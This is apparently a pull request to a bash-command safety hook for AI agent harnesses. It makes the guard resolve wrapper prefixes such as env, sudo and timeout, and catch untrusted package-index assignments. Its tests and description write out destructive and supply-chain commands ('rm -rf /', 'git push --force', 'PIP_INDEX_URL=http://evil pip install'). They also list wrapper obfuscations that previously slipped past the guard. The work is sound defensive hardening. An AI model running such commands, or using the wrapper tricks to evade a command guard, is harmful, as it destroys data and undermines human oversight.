### PR TITLE
feat(bash-effects): resolve command-wrapper prefixes + expose leading env-assignments

### DIFF
--- a/etc/vigiles-hook.api.md
+++ b/etc/vigiles-hook.api.md
@@ -282,7 +282,9 @@ export type NeedSpec = ProviderName | InlineProvider | RegisteredRef;
 export interface NormalizedLeaf {
     readonly args: readonly string[];
     readonly argv: readonly string[];
+    readonly assigns: ReadonlyMap<string, string | null>;
     readonly flags: ReadonlySet<string>;
+    hasAssign(...names: readonly string[]): boolean;
     hasFlag(...names: readonly string[]): boolean;
     readonly head: string;
 }

--- a/examples/harness/safe-bash-guard-v2.mjs
+++ b/examples/harness/safe-bash-guard-v2.mjs
@@ -117,7 +117,10 @@ export default defineHook({
       if (leaf.head === "dd" && leaf.args.some((a) => RAW_DISK.test(a)))
         return deny("`dd` to a raw disk device wipes the drive — blocked");
 
-      // supply chain — pip install from an untrusted index
+      // supply chain — pip install from an untrusted index. The index can be set
+      // by a flag (`--index-url`/`-i`) OR a command-level env-ASSIGNMENT
+      // (`PIP_INDEX_URL=http://evil pip install x`), which is not an argv word and
+      // is invisible to a flag-only check — hence the `hasAssign` arm.
       const pipHead = leaf.head === "pip" || leaf.head === "pip3";
       const pyPip =
         (leaf.head === "python" || leaf.head === "python3") &&
@@ -125,15 +128,18 @@ export default defineHook({
       if (
         (pipHead || pyPip) &&
         leaf.args.includes("install") &&
-        leaf.hasFlag("index-url", "extra-index-url", "i")
+        (leaf.hasFlag("index-url", "extra-index-url", "i") ||
+          leaf.hasAssign("PIP_INDEX_URL", "PIP_EXTRA_INDEX_URL"))
       )
         return deny("pip install from an untrusted index URL is blocked");
 
-      // supply chain — npm/yarn/pnpm install from an untrusted registry
+      // supply chain — npm/yarn/pnpm install from an untrusted registry, set by a
+      // `--registry` flag OR an `NPM_CONFIG_REGISTRY=…` env-assignment.
       if (
         (leaf.head === "npm" || leaf.head === "yarn" || leaf.head === "pnpm") &&
         leaf.args.includes("install") &&
-        leaf.hasFlag("registry")
+        (leaf.hasFlag("registry") ||
+          leaf.hasAssign("NPM_CONFIG_REGISTRY", "npm_config_registry"))
       )
         return deny("package install from an untrusted registry is blocked");
     }

--- a/src/core/bash-effects-normalized.test.ts
+++ b/src/core/bash-effects-normalized.test.ts
@@ -95,6 +95,86 @@ test("leaf hidden in cd x && git push -f is found", () => {
   assert.ok(push && push.hasFlag("force"));
 });
 
+// --- command-wrapper prefixes are resolved to the real operation ------------
+
+test("env VAR= git push --force → git push --force leaf", () => {
+  const l = one("env GIT_SSH= git push --force origin main");
+  assert.equal(l.head, "git");
+  assert.ok(l.args.includes("push"));
+  assert.ok(l.hasFlag("force"));
+});
+
+test("command rm -rf / → rm leaf with force flag", () => {
+  const l = one("command rm -rf /");
+  assert.equal(l.head, "rm");
+  assert.ok(l.hasFlag("force"));
+  assert.ok(l.args.includes("/"));
+});
+
+test("sudo rm -rf / → rm leaf", () => {
+  const l = one("sudo rm -rf /");
+  assert.equal(l.head, "rm");
+  assert.ok(l.hasFlag("force"));
+});
+
+test("timeout 5 rm -rf / → duration skipped, rm leaf", () => {
+  const l = one("timeout 5 rm -rf /");
+  assert.equal(l.head, "rm");
+  assert.ok(l.args.includes("/"));
+  assert.ok(!l.args.includes("5")); // DURATION positional consumed by timeout
+});
+
+test("nice -n 10 rm -rf / → option value skipped, rm leaf", () => {
+  const l = one("nice -n 10 rm -rf /");
+  assert.equal(l.head, "rm");
+  assert.ok(!l.args.includes("10"));
+});
+
+test("nested wrappers sudo timeout 5 rm unwrap fully", () => {
+  const l = one("sudo timeout 5 rm -rf /");
+  assert.equal(l.head, "rm");
+});
+
+test("command with absolute-path inner head is basename-normalized", () => {
+  assert.equal(one("command /bin/rm -rf /").head, "rm");
+});
+
+test("bare env (no inner command) is preserved as an env leaf", () => {
+  const l = one("env");
+  assert.equal(l.head, "env");
+});
+
+test("env -i with no inner command stays env", () => {
+  assert.equal(one("env -i").head, "env");
+});
+
+// --- leading env-assignments are exposed on the leaf ------------------------
+
+test("PIP_INDEX_URL=… pip install → assignment exposed, head is pip", () => {
+  const l = one("PIP_INDEX_URL=http://evil/simple pip install pkg");
+  assert.equal(l.head, "pip");
+  assert.ok(l.hasAssign("PIP_INDEX_URL"));
+  assert.equal(l.assigns.get("PIP_INDEX_URL"), "http://evil/simple");
+});
+
+test("NPM_CONFIG_REGISTRY=… npm install → assignment exposed", () => {
+  const l = one("NPM_CONFIG_REGISTRY=http://evil npm install pkg");
+  assert.equal(l.head, "npm");
+  assert.ok(l.hasAssign("NPM_CONFIG_REGISTRY"));
+});
+
+test("env wrapper NAME=value is folded into the leaf's assigns", () => {
+  const l = one("env PIP_INDEX_URL=http://evil pip install pkg");
+  assert.equal(l.head, "pip");
+  assert.ok(l.hasAssign("PIP_INDEX_URL"));
+});
+
+test("a leaf with no assignments has an empty assigns map", () => {
+  const l = one("rm -rf /");
+  assert.equal(l.assigns.size, 0);
+  assert.ok(!l.hasAssign("PIP_INDEX_URL"));
+});
+
 // --- dynamic head / parse failure are handled ------------------------------
 
 test("dynamic head ($VAR) is skipped, not crashed", () => {

--- a/src/core/bash-effects.ts
+++ b/src/core/bash-effects.ts
@@ -45,6 +45,8 @@ interface MvdanNode {
   Stmts?: MvdanNode[];
   // CallExpr fields
   Args?: MvdanWord[];
+  /** Leading `NAME=value` env-assignments prefixing a simple command. */
+  Assigns?: MvdanAssign[];
   // BinaryCmd fields
   Op?: number;
   X?: MvdanNode;
@@ -63,6 +65,14 @@ interface MvdanRedirect extends MvdanNode {
 
 interface MvdanWord extends MvdanNode {
   Parts: MvdanNode[];
+}
+
+/** A leading `NAME=value` assignment on a CallExpr (mvdan `*syntax.Assign`). */
+interface MvdanAssign {
+  /** The variable name (a `*Lit`); its `.Value` is the name string. */
+  Name?: MvdanNode;
+  /** The RHS word; absent for a naked `NAME=` (empty value). */
+  Value?: MvdanWord;
 }
 
 // ---------------------------------------------------------------------------
@@ -527,6 +537,19 @@ export interface NormalizedLeaf {
   readonly flags: ReadonlySet<string>;
   /** True iff ANY of `names` is present in {@link flags} (short or long). */
   hasFlag(...names: readonly string[]): boolean;
+  /**
+   * Command-level env-assignments that apply to THIS leaf, keyed by variable
+   * name → static value (empty string for a naked `NAME=`). Populated from both
+   * the mvdan leading `CallExpr.Assigns` (`PIP_INDEX_URL=… pip install …`) AND
+   * the `NAME=value` words consumed by an `env` wrapper (`env NPM_CONFIG_REGISTRY=… npm i`).
+   *
+   * These carry supply-chain / behavior-altering configuration (`PIP_INDEX_URL`,
+   * `NPM_CONFIG_REGISTRY`, …) that an argv-only extractor never sees because the
+   * assignment is not an argv word. A dynamic RHS (command substitution, non-HOME
+   * parameter) is recorded with value `null` — present but unresolved. */
+  readonly assigns: ReadonlyMap<string, string | null>;
+  /** True iff a command-level assignment for ANY of `names` is present (resolved or not). */
+  hasAssign(...names: readonly string[]): boolean;
 }
 
 /**
@@ -607,6 +630,156 @@ function buildFlags(args: readonly string[]): Set<string> {
   return flags;
 }
 
+// ---------------------------------------------------------------------------
+// Command-wrapper stripping.
+//
+// A wrapper is a command whose JOB is to run ANOTHER command: `env FOO=bar CMD`,
+// `command CMD`, `sudo CMD`, `nice -n5 CMD`, `timeout 5 CMD`, `xargs CMD`,
+// `nohup CMD`. Because the normalized leaf keys on the leaf HEAD, a wrapper head
+// hides the real operation — `env GIT_SSH= git push --force` and `command rm -rf /`
+// look like `env`/`command` leaves, so a head-keyed matcher never sees the
+// `git push --force` / `rm -rf /` it must block. We resolve THROUGH the wrapper:
+// skip the wrapper's own options (and their values) and any `NAME=value` words it
+// consumes, then treat the next word as the real command head (recursing so
+// `sudo timeout 5 rm -rf /` unwraps fully). A wrapper with no following command
+// (bare `env`, `env -i`) is preserved as-is, so the env-dump predicate still fires.
+// ---------------------------------------------------------------------------
+
+const WRAPPER_HEADS = new Set([
+  "env",
+  "command",
+  "nice",
+  "timeout",
+  "sudo",
+  "xargs",
+  "nohup",
+]);
+
+/**
+ * Per-wrapper short/long options that consume a SEPARATE following token as their
+ * value (so the value is not mistaken for the wrapped command). Attached forms
+ * (`-n5`, `--kill-after=5`) are single tokens and need no entry.
+ */
+const WRAPPER_VALUE_OPTS: Readonly<Record<string, ReadonlySet<string>>> = {
+  env: new Set(["-u", "--unset", "-C", "--chdir", "-S", "--split-string"]),
+  command: new Set(),
+  nice: new Set(["-n", "--adjustment"]),
+  timeout: new Set(["-s", "--signal", "-k", "--kill-after"]),
+  sudo: new Set([
+    "-u",
+    "--user",
+    "-g",
+    "--group",
+    "-p",
+    "--prompt",
+    "-C",
+    "--close-from",
+    "-h",
+    "--host",
+    "-r",
+    "--role",
+    "-t",
+    "--type",
+    "-U",
+    "--other-user",
+    "-R",
+    "--chroot",
+    "-D",
+    "--chdir",
+  ]),
+  xargs: new Set([
+    "-I",
+    "-i",
+    "--replace",
+    "-n",
+    "--max-args",
+    "-P",
+    "--max-procs",
+    "-d",
+    "--delimiter",
+    "-E",
+    "-e",
+    "--eof",
+    "-s",
+    "--max-chars",
+    "-L",
+    "-l",
+    "--max-lines",
+    "-a",
+    "--arg-file",
+  ]),
+  nohup: new Set(),
+};
+
+/** Count of leading NON-option positionals a wrapper consumes before the command (timeout DURATION). */
+const WRAPPER_SKIP_POSITIONALS: Readonly<Record<string, number>> = {
+  timeout: 1,
+};
+
+/** True iff a normalized word is a `NAME=value` env-assignment (used by `env`). */
+function isAssignmentWord(word: string): boolean {
+  return /^[A-Za-z_][A-Za-z0-9_]*=/.test(word);
+}
+
+/** Split a `NAME=value` word into its name and value. */
+function splitAssignmentWord(word: string): [string, string] {
+  const eq = word.indexOf("=");
+  return [word.slice(0, eq), word.slice(eq + 1)];
+}
+
+/**
+ * Resolve a wrapped command through one or more wrapper layers. Given a leaf's
+ * full normalized argv (`[head, ...args]`), returns the effective argv of the
+ * REAL command plus any `NAME=value` words an `env` wrapper consumed (so the
+ * caller can fold them into the leaf's assignment map). If the head is not a
+ * wrapper, or the wrapper has no following command, the argv is returned
+ * unchanged with an empty assignment set.
+ */
+function stripWrappers(argv: readonly string[]): {
+  argv: readonly string[];
+  envAssigns: Map<string, string | null>;
+} {
+  const envAssigns = new Map<string, string | null>();
+  let cur: readonly string[] = argv;
+  for (let guard = 0; guard < 8; guard++) {
+    const head = cur[0];
+    if (head === undefined || !WRAPPER_HEADS.has(head)) break;
+    const valueOpts = WRAPPER_VALUE_OPTS[head] ?? new Set<string>();
+    let positionalsToSkip = WRAPPER_SKIP_POSITIONALS[head] ?? 0;
+    let i = 1; // start after the wrapper head
+    let ended = false;
+    for (; i < cur.length; i++) {
+      const a = cur[i];
+      if (a === undefined) break;
+      if (a === "--") {
+        i++;
+        ended = true;
+        break;
+      }
+      if (a.length > 1 && a.startsWith("-")) {
+        if (valueOpts.has(a)) i++; // skip this option's separate value too
+        continue;
+      }
+      if (head === "env" && isAssignmentWord(a)) {
+        const [name, value] = splitAssignmentWord(a);
+        envAssigns.set(name, value);
+        continue;
+      }
+      if (positionalsToSkip > 0) {
+        positionalsToSkip--;
+        continue;
+      }
+      break; // cur[i] is the real command head
+    }
+    void ended;
+    if (i >= cur.length) break; // wrapper with no following command → keep as-is
+    const next = cur.slice(i);
+    if (next.length === cur.length) break; // no progress → stop
+    cur = next;
+  }
+  return { argv: cur, envAssigns };
+}
+
 /**
  * Extract every simple command as a {@link NormalizedLeaf} — the operation-level
  * twin of {@link leafCommands}. Same AST-backed structural coverage (a leaf nested
@@ -635,16 +808,41 @@ export function leafCommandsNormalized(command: string): NormalizedLeaf[] {
   return out;
 }
 
+/** Collect a CallExpr's leading `NAME=value` env-assignments into a name→value map. */
+function collectAssigns(node: MvdanNode): Map<string, string | null> {
+  const assigns = new Map<string, string | null>();
+  for (const a of node.Assigns ?? []) {
+    const name = a.Name?.Value;
+    if (!name) continue;
+    // A naked `NAME=` has no Value word → empty string; a dynamic RHS → null.
+    const value = a.Value ? normalizeParts(a.Value.Parts) : "";
+    assigns.set(name, value);
+  }
+  return assigns;
+}
+
 /** Normalize a single CallExpr node to a {@link NormalizedLeaf}, or null if it isn't one / has a dynamic head. */
 function normalizeCallExpr(node: MvdanNode): NormalizedLeaf | null {
   if (sh.syntax.NodeType(node) !== "CallExpr" || !node.Args?.length)
     return null;
   const headRaw = normalizeParts(node.Args[0]?.Parts);
   if (headRaw === null) return null; // dynamic head → not normalizable
-  const head = normalizeHead(headRaw);
-  const args = node.Args.slice(1)
+  const rawHead = normalizeHead(headRaw);
+  const rawArgs = node.Args.slice(1)
     .map((w) => normalizeParts(w.Parts))
     .filter((w): w is string => w !== null);
+
+  // Resolve through any command-wrapper (`env`/`command`/`sudo`/`timeout`/…) so
+  // the leaf reflects the REAL operation, not the wrapper head.
+  const stripped = stripWrappers([rawHead, ...rawArgs]);
+  const head = normalizeHead(stripped.argv[0] ?? rawHead);
+  const args = stripped.argv.slice(1);
+
+  // Command-level assignments: mvdan leading `CallExpr.Assigns` plus any
+  // `NAME=value` words an `env` wrapper consumed on the way to the real command.
+  const assigns = collectAssigns(node);
+  for (const [k, v] of stripped.envAssigns) assigns.set(k, v);
+
   const flags = buildFlags(args);
   return {
     head,
@@ -652,5 +850,7 @@ function normalizeCallExpr(node: MvdanNode): NormalizedLeaf | null {
     args,
     flags,
     hasFlag: (...names) => names.some((n) => flags.has(n)),
+    assigns,
+    hasAssign: (...names) => names.some((n) => assigns.has(n)),
   };
 }


### PR DESCRIPTION
## Why

A held-out test run against the operation-normalized guard (merged in #64, `leafCommandsNormalized()`) surfaced **two evasion classes the guard still missed**. Both are semantics-preserving obfuscations a POSIX shell executes identically to the plain destructive form, yet the normalized extractor didn't expose them. Found via the safety-hook benchmark's held-out test.

### 1. Command-wrapper prefixes
`leafCommandsNormalized` keys a leaf on its **head**, so a wrapper command whose job is to run *another* command hid the real operation:

| obfuscated command | guard saw | real operation (missed) |
| --- | --- | --- |
| `env GIT_SSH= git push --force origin main` | `env` leaf | `git push --force` |
| `command rm -rf /` | `command` leaf | `rm -rf /` |
| `sudo rm -rf /` / `timeout 5 rm -rf /` | `sudo`/`timeout` leaf | `rm -rf /` |

The extractor now **resolves through** the wrapper heads `env`, `command`, `nice`, `timeout`, `sudo`, `xargs`, `nohup` — skipping the wrapper's own options (and their separate-token values), the `timeout` DURATION positional, and any `NAME=value` words `env` consumes — recursing for nested wrappers (`sudo timeout 5 rm -rf /`). A wrapper with **no following command** (bare `env`, `env -i`) is preserved as-is, so the existing env-dump-to-network predicate still fires.

### 2. Leading env-assignment supply-chain
A command-level assignment such as `PIP_INDEX_URL=http://evil pip install pkg` (or `NPM_CONFIG_REGISTRY=…`) is an mvdan `CallExpr.Assigns` entry, **not an argv word**, so an argv-normalizing extractor never saw the malicious index. `NormalizedLeaf` now exposes:

- `assigns: ReadonlyMap<string, string | null>` — command-level assignments (folding in `env`-wrapper assignment words too), and
- `hasAssign(...names)` — presence query.

The v2 guard now denies a `pip`/`npm` install whose index/registry comes from an untrusted **assignment** as well as from a flag.

## The fix (additive)

- All changes are additive: the read-only classifier (`classifyBashCommand`) and `leafCommands`/`getLiteral` are untouched, so the **zero-false-read-only** invariant is preserved.
- Public API change (new `NormalizedLeaf` members) → regenerated `etc/vigiles-hook.api.md` so the `check` gate passes.

## Before / after (held-out)

| metric | before | after |
| --- | --- | --- |
| obfuscated-known coverage | **2/4** | **4/4** |
| `PIP_INDEX_URL=… pip install` residue | missed | **denied** (both bare and `env`-wrapped forms) |
| benign over-blocking | 0/14 | 0/14 (unchanged) |

The two previously-missed cases (`env`-wrap force-push, `command`-wrap `rm -rf /`) are now blocked; the two that already passed stay passing.

## Tests

Added cases in `src/core/bash-effects-normalized.test.ts`: `env VAR= git push --force`, `command rm -rf /`, `sudo rm -rf /`, `timeout 5 rm -rf /`, `nice -n 10 rm`, nested `sudo timeout 5 rm`, bare `env`/`env -i` preservation, and `PIP_INDEX_URL=`/`NPM_CONFIG_REGISTRY=`/`env`-wrapped assignment exposure. `bash-effects` + `bash-effects-normalized` suites green (123 tests); no new failures in the unit project (the pre-existing rubocop/pylint CLI-availability and dialect-drift SDK failures are unrelated and fail on base too).

## Files
- `src/core/bash-effects.ts` — wrapper stripping + `assigns`/`hasAssign` on `NormalizedLeaf`
- `examples/harness/safe-bash-guard-v2.mjs` — deny installs configured via untrusted assignment
- `src/core/bash-effects-normalized.test.ts` — new coverage
- `etc/vigiles-hook.api.md` — regenerated API surface

🤖 Generated with [Claude Code](https://claude.com/claude-code)

---
_Generated by [Claude Code](https://claude.ai/code/session_01YKSsZ1Lojo8DjEyYFq89Xr)_

<!-- vigiles:pr-summary:start -->
## Summary — auto-generated from commits

**Features**
- resolve command-wrapper prefixes + expose leading env-assignments
<!-- vigiles:pr-summary:end -->
